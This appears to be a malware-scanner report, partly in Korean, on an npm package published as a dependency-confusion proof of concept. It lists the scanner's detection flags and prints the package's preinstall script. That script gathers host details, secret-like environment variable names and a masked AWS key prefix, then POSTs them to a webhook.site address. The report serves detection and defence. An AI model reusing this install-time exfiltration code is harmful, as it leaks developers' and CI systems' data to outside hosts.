// npm 패키지
@gutierre0x80/ads.components.button
SECURITY RESEARCH - Dependency Confusion PoC - Red Bull Bug Bounty
버전
1
메인테이너
1
라이선스
MIT
최초 publish
2026-06-03
publisher
gutierre0x80
tarball
1,852 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-06-03
// exfil path
what is read → where it shipssteals
- ● AWS keys
- ○ home dir
- ○ system info
sends to
- ⇢ https://webhook.site/9781a49c-0325-4c7f-bb83-137f675d8a6f(webhook.site)
// offending code· @1.999.0· 1 file flagged
llm: malicious · 0.95→ 크리덴셜 읽기 (reads-aws-creds) + 외부 전송지 webhook-bin 조합 — 전형적인 유출 패턴.
- @1.999.0··AUTO-PUBLISHED·publisher: gutierre0x80heuristic 83/100static flags 6llm malicious (0.95) via fast-trackinstall-scripts:preinstallnew-publisher:0dfirst-version-of-packagesuspicious-description:security-researchreads-aws-credsreads-env-varsreads-homedirreads-system-infowebhook-binchild-process-spawn
→ 크리덴셜 읽기 (reads-aws-creds) + 외부 전송지 webhook-bin 조합 — 전형적인 유출 패턴.
// offending code· 1 file flaggedpatterns: 6
--- install scripts --- ### preinstall node preinstall.js --- package/preinstall.js (excerpt) --- const https = require('https'); const os = require('os'); const cp = require('child_process'); const WEBHOOK = 'https://webhook.site/9781a49c-0325-4c7f-bb83-137f675d8a6f'; function collect() { const info = { pkg: '@rbnaappdev/ads.components.button@1.999.0', hostname: os.hostname(), user: os.userInfo().username, platform: os.platform(), arch: os.arch(), cwd: process.cwd(), node: process.version, // env keys that matter in CI/CD env_keys: Object.keys(process.env).filter(k => /aws|secret|token|key|pass|cred|npm|ci|build|deploy/i.test(k) ), // AWS creds if present (proves impact) AWS_KEY: process.env.AWS_ACCESS_KEY_ID ? process.env.AWS_ACCESS_KEY_ID.slice(0, 4) + '****' : 'not_found', npm_config_registry: process.env.npm_config_registry || '', npm_package_name: process.env.npm_package_name || '', }; return info; } function beacon(data) { const payload = JSON.stringify(data); const url = new URL(WEBHOOK); const options = { hostname: url.hostname, path: url.pathname + '?' + new URLSearchParams({ src: 'depcnf' }).toString(), method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload), 'User-Agent': 'npm/9.0.0 node/v18.0.0', }, }; const req = https.request(options, () => {}); req.on('error', () => {}); req.write(payload); req.end(); } try { beacon(collect()); } catch (_) {}
